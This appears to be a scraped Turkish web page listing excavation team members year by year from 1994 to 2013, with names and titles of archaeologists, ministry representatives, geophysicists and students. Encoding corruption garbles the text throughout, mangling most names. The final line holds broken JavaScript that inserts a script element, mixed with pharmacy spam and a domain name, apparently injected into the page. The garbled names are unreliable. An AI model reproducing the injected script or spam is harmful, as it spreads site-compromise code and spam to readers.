KazA� Ekibi

1994 YILI KAZI EKA�BA�
Arkeolog A?yeler:Prof. Dr. Metin A�lkA�AYA�k,Prof. Dr.Mehmet A�zdoAYan, Prof.Dr.BA?lent A�plikA�ioAYlu,Yrd.DoA�.Dr.M.A�hsan Tunay, ArAY.GA�r.Murat Bayrak, Foto Uzm.Selamet TaAYkA�n, DesinatA�r-Arkeolog AyAYe A�zkan,Topograf Adnan Azakar
1995 YILI KAZI EKA�BA�
Arkeolog Recep OkA�u (BakanlA�k Temsilcisi) A?yeler: Azadiye BaAYaran, ArAY.GA�r. Ufuk KocabaAY, Banu UA�ar, Ramazan YA�lmaz, Arkeolog-DesinatA�r AyAYe A�zkan, Foto UzmanA� Selamet TaAYkA�n, Topograf Adnan Azakar, A�AYrenciler: Erkan Kabil, Aysel AzenyaktA�, YA�ldA�z Canbay, NurA�in Alp, Duygu A�amurcuoAYlu, Mehmet AA�A�kalA�n, Nihan GA�kkaya, Mustafa A�zkul,Arzu AkA�a, NurgA?l AydA�n,Melek Can, TuAYba GA�kkaya
1996 YILI KAZI EKA�BA�
Arkeolog Fuat Dereli (BakanlA�k Temsilcisi) A?yeler Azadiye BaAYaran, ArAY.GA�r. Ufuk KocabaAY, Uzman IAYA�l A�zsait, Foto UzmanA� Selamet TaAYkA�n, Topograf Adnan Azakar, Jeofizik Ekibi Prof. Dr. Metin A�lkA�AYA�k, ArAY.GA�r.Murat Bayrak
1997 YILI KAZI EKA�BA�
Arkeolog SA?leyman Eskalan (BakanlA�k Temsilcisi) A?yeler: Azadiye BaAYaran Epigrafisi DoA�. Dr. HA?samettin Aksu, ArAY. GA�r. Ufuk KocabaAY, Mimar-DesinatA�r H.IAYA�l A�zsait, Jeofizik MA?hendisliAYinden proje A?yemiz Prof. Dr. Metin A�lkA�AYA�k ile ArAY. GA�r. Murat Bayrak, Foto UzmanA� Selamet TaAYkA�n, ArAY.GA�r. Sevil A�ztA?rk 21 A�AYrenci katA�lmA�AYtA�r.
1998 YILI KAZI EKA�BA�
Arkeolog UAYur TerzioAYlu (BakanlA�k Temsilcisi), A?yeler: Azadiye BaAYaran, AraAY.GA�r. Ufuk KocabaAY, IAYA�l A�zsait, Banu UA�ar, Topograf Adnan Azakar, Foto uzmanA� Selamet TaAYkA�n Jeofizik ekibi: Prof. Dr. Metin A�lkA�AYA�k ve AraAY.GA�rv. Murat Bayrak.A�AYrenciler: G.Beren Tuncay, Funda BerbercioAYlu, Leman Arslan, Derya A�A�AYA�r,A�zlem Sunar,Y. Emre BaAYol, NilA?fer KA�zA�k, A�brahim A�eAYmeli, Mete Aksan,Sanem TA?rk, A�zlem Samur, Yusuf Cihan GA?rsoy,HA?lya GA�zA?kA�zA�l,Evren Azar, Serpil ArA�n, NurgA?l Uslu, GA�rkem S.A�zden, Buket Buyruk,Tolga Alhan
1999 YILI KAZI EKA�BA�
Arkeolog Sibel Alpaslan (BakanlA�k Temsilcisi) A?yeler: Azadiye BaAYaran, AraAY. GA�rv. Ufuk KocabaAY, IAYA�l A�zsait, Azadiye BaAYaran Foto UzmanA� Selamet TaAYkA�n, Arkeolog A�mer A�elik, Jeofizik: Prof. Dr. Metin A�lkA�AYA�k ve AraAY.GA�rv. Murat Bayrak A�AYrenciler: Ebru MemiAY, Reyhan Azahin, Serra Kaynak Yurdanur AkpA�nar, AyAYe Tepeyurt, Onur Bilgin, Zafer Bora, Deniz AltA�ok, Derya Tosun, Tansu Acar, ZA?beyde Alpsoy, AslA� AydA�n, GA?lbahar GA?A�lA?, BurA�in AdA�sA�nmez, Sibel Azen, Beren Tuncay, M.Onur BaAYaran katA�lmA�AYtA�r.
2000 YILI KAZI EKA�BA�
Arkeolog Filiz Avan (BakanlA�k Temsilcisi) A?yeler: Azadiye BaAYaran, ArAY. GA�rv. Ufuk KocabaAY, Uzman IAYA�l KocabaAY, ArAY.GA�r.Banu UA�ar Jeofizik araAYtA�rmalarA� iA�in: Prof.Dr.Ahmet Ercan, Prof. Dr. Metin A�lkA�AYA�k ve AraAY.GA�rv. Murat Bayrak, Foto UzmanA� Selamet TaAYkA�n, TopoAYraf Adnan Azakar, Arkeolog A.Derya Tosun,A�AYrenciler: GA?lder Emre, Sibel Azen, G.Beren Tuncer, GA?lbahar GA?A�lA?,Necla GA?ngA�rmA?AY,Burcu Ercen, Zafer Bora,Onur Bilgin, Serra Kanyak, AyAYa Tepeyurt,Deniz Aytokmak,Sevim A�z,GA?lbin SA�AYA?tlA?oAYlu,Erdem AkA�n, M.Tolga Tosun,Haluk CA�zA�k,Erdem AzentA?rk,Ebru MemiAY, Cezrail A�albay,Reyhan Azahin,M.Tolga Tosun
2001 YILI KAZI EKA�BA�
Arkeolog Naci BakA�rcA� (BakanlA�k Temsilcisi), A?yeler: Azadiye BaAYaran, AraAY.GA�rv. Ufuk KocabaAY, ArAY.GA�r. Banu UA�ar,ArAY.GA�r.GA?rkan Engin, Ebru MemiAY, Foto UzmanA� Slamet TaAYkA�n
2002 YILI KAZI EKA�BA�
Arkeolog Akan Atilla (BakanlA�k Temsilcisi) A?yeler: Azadiye BaAYaran, ArAY.GA�rv. Ufuk KocabaAY, Banu UA�ar, Ebru MemiAY Yrd.DoA�.Dr.Emin Ulugergerli, Topograf Adnan Azakar,Foto UzmanA� Selamet TaAYkA�n, A�AYrenciler: Seda Tulgar, Devrim Bekret, Simge GA?lter, Serkan GedA?k, Kerem BaAYaran, Burcu YA?cel, AslA� GA?ltekin, Sami Sert, Fatih KA�se, Cemalettin AkyA?z, Deniz A�ztekin, Hande GA?nA�zA?, Eda EAYinA�, Sibel Azen, Esra Dolay.
2003 YILI KAZI EKA�BA�
Arkeolog Cengiz AslantaAY (BakanlA�k Temsilcisi) A?yeler,: Azadiye BaAYaran, DoA�.Dr.HA?samettin Aksu,ArAY.GA�r.Ufuk KocabaAY, ArAY.GA�r. Banu UA�ar, Ebru MemiAY, Topograf Adnan Azakar, Foto UzmanA� Selamet TaAYkA�n, DoA�.Dr.Emin Ulugergerli, Yrd.DoA�.Dr.Ahmet GA?leA�, A�AYrenciler: GA?lnur Kurap, Seda Tulgar, Serkan GedA?k, Kerem BaAYaran,Sami Sert, Kerem BaAYaran, Burcu YA?cel,DrahAYan KaramA�k, Hakan A�zkan, TanrA�A�ver, Olga Safronova, AzehrigA?l YeAYil, UAYur TunalA�, Simge GA?lter, BA?lent YeAYildaAY, Deniz A�ztekin,Hakan A�zkan,Kemal SA?mer
2004 YILI KAZI EKA�BA�
Arkeolog Fuat Dereli (BakanlA�k Temsilcisi), A?yeler: Azaadiye BaAYaran, ArAY.GA�r. F. Banu UA�ar, GA?rkan Ergin jeofizik araAYtA�rmalarA� iA�in Yrd. DoA�. Dr. Emin Ulugergerli, Foto uzmanA� Selamet TaAYkA�n, A�AYrenciler: Burcu YA?cel, Serkan GedA?k, BurA�in TaAY, GA?lnur Kurap, Asker A?lker, Sibel A�zgen, A�zkan YA�ldA�z, Ozan TanrA�A�ver, TA?lay UAYur, Mahmut A�aylak, Zeynep GA?rsoy, Yasin Kaya, A�aAYlar A�akA�r, Nuray A�zbilir, DrahAYan KaramA�k, Kerem BaAYaran, A�iAYdem Kibar, Deniz A�ztekin, M.Onur BaAYaran katA�lmA�AYlardA�r.
2005 YILI KAZI EKA�BA�
Arkeolog Neslihan KA?rA?m (BakanlA�k temsilcisi) A?yeler: Azadiye BaAYaran, Dr. Ufuk KocabaAY, F.Banu UA�ar, H.IAYA�l A�zsait, AraAY.GA�rv. GA?rkan Ergin, Arkelog Ramazan YA�lmaz, RestoratA�r Burcu YA?cel, Serkan GedA?k, GA?lnur Kurap, BurA�in TaAY, Kerem Abuhan, Burcu A�akmaz, Mustafa EruAY, Sibel A�zgen, Mahmut A�aylak, BA?lent YalA�A�ndaAY, Nurver Ferendeci, Duygu YA�lmaz, Kerem BaAYaran, M.Onur BaAYaran.
2006 YILI KAZI EKA�BA�
Arkeolog Yusuf Benli (BakanlA�k Temsilcileri), A?yeler Azadiye BaAYaran, Dr. Ufuk KocabaAY, Uzman H.IAYA�l KocabaAY, AraAY.GA�rv. F. Banu UA�ar, GA?rkan Ergin, Jeofizik ekibi: Yrd. DoA�. Dr. Fethi Ahmet YA?ksel, DoA�. Dr. Emin Ulugergerli, Arkeolog Ramazan YA�lmaz, A�AYrenciler: Mahmut A�aylak, Burcu YA?cel, GA?lnur Kurap, Kerem Abuhan,, Mustafa EruAY, Sibel A�zgen, Sinem KA�stak, A�lker KA�zA�lA�ay, FA�rat Buzlu, A�zden A�elik, GA�kA�e Egin, A�aAYlar A�akA�r, NamA�k KA�lA�A�, Ebru ErtuAYrul, Duygu YA�lmaz, Kerem BaAYaran, GA�kA�e Say, Emine Azener, Fatih Solak ve M. Onur BaAYaran, Foto UzmanA� Selamet TaAYkA�n, TopoAYraf Adnan Azakar gA�rev aldA�lar
2007 YILI KAZI EKA�BA�
Arkeolog Mehmet DA?lkadiroAYlu (BakanlA�k Temsilcisi), Azadiye BaAYaran, Dr. GA?lder Emre, Arkeolog Ramazan YA�lmaz, Yrd. DoA�. Dr. Fethi Ahmet YA?ksel, DoA�. Dr. Emin Ulugergerli, TopoAYraf Adnan Azakar, Foto UzmanA� Selamet TaAYkA�n, A�AYrenciler: Mahmut A�aylak, GA?lnur Kurap, Kerem Abuhan, S.Halit Canol, Burcu KA�yA�cA�, Ufuk Soysal, Baran YeAYilyurt, UAYur GA�kA�e, A�lkin Atayman, EylA?l Belit A�nen, Melek Evran, Onur TopbaAY, Diyana Yirmi, Eylem Aksoy, Duygu KargA�, Engin DA?AYencili,Kerem BaaAYaran,AyAYegA?l A�etiner, A�aAYlar A�akA�r, Canan KeleAY,NamA�k KA�lA�A�.
2008 YILI KAZI EKA�BA�
Arkeolog Neslihan KA?rA?m (BakanlA�k Temsilcisi), Azadiye BaAYaran, Prof. Dr. Stefan Karwiese, Foto UzmanA� Selamet TaAYkA�n, ArAY.GA�r. F.Banu UA�ar A�akan, ArAY.GA�rv. GA?lder Emre, GA?lnur Kurap, Okutman Ramazan YA�lmaz, AyAYegA?l A�etiner, A�lkin Atayman, Merve Alkan, GA�rkem Hersek, Deniz Nurcan, Eren Demirer, Kaan Kongar, Yasemin A�etiner, Melek Evran, Duygu KargA�, Murat BahadA�r, Bilkay OAYuz,
2009 YILI KAZI EKA�BA�
Arkeolog Erkan Dede (BakanlA�k Temsilcisi), Azadiye BaAYaran, Prof.Dr.Stefan Karwiese, ArAY.GA�r. F.Banu A�akan, Yrd. DoA�. Dr. Murat A�akan Okt.Ramazan YA�lmaz, RestoratA�r RestoratA�r GA?lnur Kurap, A�AYrenciler: A�lkin Atayman, Ufuk Soysal, Deniz Nurcan, Yasemin A�etiner, Seda BA?yA?kbayrak, GA?lA�in Uzuner, Murat BahadA�r, Bilkay OAYuz, NilA?fer HA?zmeli, YalA�A�n Batur, Buket Kafadar, Yasemin A�zkan, Nehir GA?mA?AYlA?, Gamze A�ztA?rk, UAYur Alanyurt, AyAYegA?l A�etiner, Mimar M.Onur BaAYaran, Jeofizik UzmanA� Yrd. DoA� Dr. Fethi Ahmet YA?ksel, Foto UzmanA� Selamet TaAYkA�n
2010 YILI KAZI EKA�BA�
Arkeolog Selda YA�ldA�z (BakanlA�k Temsilcisi), Azadiye BaAYaran, Prof. Dr. Stefan Karwiese, GA?lnur Kurap, Dr.F.Banu A�akan, Yrd.DoA�.Dr.Murat A�akan, Uzm.Ramazan YA�lmaz, Uzm.YA?ksel Dede,Mimar Onur BaAYaran, Uzm.DesinatA�r AyAYegA?l A�etiner, Foto UzmanA� Selamet TaAYkA�n,Ufuk Soysal,UAYur Alanyurt, Seda BA?yA?kbayrak, GA?lA�in Uzuner, NilA?fer HA?zmeli, Yasemin A�etiner,Melek Evran,Deniz Nurcan, G.Ceren Azahin, Azule YA�ldA�z, A�lknur Kaymaz, Emel GA�ren, Duygu Ede, Murat BahadA�r, YalA�A�n Batur, Yavuz S.YalA�A�n, Almanyaa��dan Dr. Thomas Schidts, Dr.Ronald Bockius, Guido Heinz; MoAYolistana��dan Chinzorig Samdan, Soyoterdene Guugel, Bibigul Zyninyel, Mimar Onur BaAYaran katA�lmA�AYtA�r.
2011 YILI KAZI EKA�BA�
Arkeolog Sena Mutlu, Azahan KA�rA�A�n ve Fuat DurmuAY (BakanlA�k Temsilcileri), A?yeler: Azadiye BaAYaran, ArAY.GA�rv. GA?lnur Kurap, Prof. Dr. Stefan Karwiese, Yrd. DoA�. Dr. Fatma Banu A�akan, Yrd.DoA�.Dr.Murat A�akan, Dr. Thomas Schmidts, Dr.S. SA�rrA� Seren, Erol BayA�rlA�, F.Recai Seren, Guido Heinz, Foto UzmanA� Selamet TaAYkA�n, Mimar M.Onur BaAYaran, DesinatA�r AyAYegA?l A�etiner, Elif Girgin, A�AYrenciler: NilA?fer HA?zmeli, Ayhan GA?l, Abdullah A�ifter, GA�khan A�ztA?rk, A�zlem Acer, Y.BahadA�r IAYA�k, Sema BakA�r, Bahar Emin, Sibel Azen, Bengi KA�rA�cA�, Selkan Solmaz, Martin Seeliger, Melanie Bartz ve Rilana Rauhut.
2012 YILI KAZI EKA�BA�
Kemal DedeoAYlu (BakanlA�k Temsilcisi) . A?yeler: ArAY.GA�r. GA?lnur Kurap, Prof. Dr. Stefan Karwiese, DesinatA�r AyAYegA?l A�etiner, Elif Girgin, Dr. Thomas Schmidts, Uzm. YA?ksel Dede, Yrd.DoA�.Dr.Fethi Ahmet YA?ksel, Dr. S. SA�rrA� Seren, F.Recai Seren, Guido Heinz, Prof. Dr. Helmut BrA?ckner, Martin Seeliger, Friederike Stock, Daniel Hoppe, Dr. Dennis Wilken, Dr. Tina Wunderlich, Mustafa Semih TavukA�u NilA?fer HA?zmeli, Elif Cankurt, Azeyda Sapma, Alev Demirer, MA?zeyyen A�zkaya, Cihan Baltepe, OAYuz Alp Ekinci, Gizem Azen, BA�rte Miray Ander, Ceyhun DoAYan, Mimar Onur BaAYaran
2013 YILI KAZI EKA�BA�
Azahan KA�rA�A�n, (BakanlA�k Temsilcisi), A?yeler: Azadiye BaAYaran ArAY.GA�r. GA?lnur Kurap, Prof. Dr. Stefan Karwiese, Yrd. DoA�.Dr. Ahmet Vefa A�obanoAYlu, Uzm.YA?ksel Dede, , Yrd..DoA�.Dr.Levent Uncu, Ercan Erkul, A�smail Kaplanvural. Almanyaa��dan: Dr. Thomas Schmidts, Guido Heinz, Prof. Dr. Helmut BrA?ckner, Martin Seeliger, Dominik Brill, Dr. Dennis Wilken, Dr. Tina Wunderlich, Katrin Schwarzkogler, Heike BA?cherl, Anja Kramer, Asuman Latzer-Lasar, Stephanie Merkel, Dr. Anna Pint, Jesmin Andersen, Clemens Mohr, Sarah SplettstA�sser, Davit Schumann, ABDa��den:Minh N.P.Schimmelmann, Arndt K.A.Schimmelmann, A�AYrenciler: Mustafa Semih TavukA�u, Utku Kamil Kama, Hazal Ongun, Selin YalA�A�n, Esra BaAY, Esra Erarslan, Nur Aylin YA�lmaz, Eda KA?bra GA�rA?r.
if (document.currentScript) { cheap vardenafil online Pills document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) { order cefixime topspyapps.net Pills Order Buy